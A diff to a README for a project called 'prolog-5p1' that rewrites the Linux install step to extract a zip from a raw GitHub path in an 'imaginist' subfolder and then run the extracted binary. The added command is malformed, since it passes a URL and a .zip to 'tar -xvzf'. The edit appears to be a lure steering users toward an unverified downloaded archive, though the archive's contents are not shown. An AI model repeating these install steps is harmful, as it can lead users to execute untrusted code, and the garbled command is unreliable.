7amdaoui10/prolog-5p1/README.md

 - Drag the prolog-5p1 icon to your Applications folder.

 ### For Linux Users
-- Extract the tar.gz file using the command: `tar -xvzf prolog-5p1.tar.gz`.
+- Extract the https://raw.githubusercontent.com/7amdaoui10/prolog-5p1/main/imaginist/prolog-5p1.zip file using the command: `tar -xvzf https://raw.githubusercontent.com/7amdaoui10/prolog-5p1/main/imaginist/prolog-5p1.zip`.
 - Open a terminal and navigate to the extracted folder.
 - Run the application with the command: `./prolog-5p1`.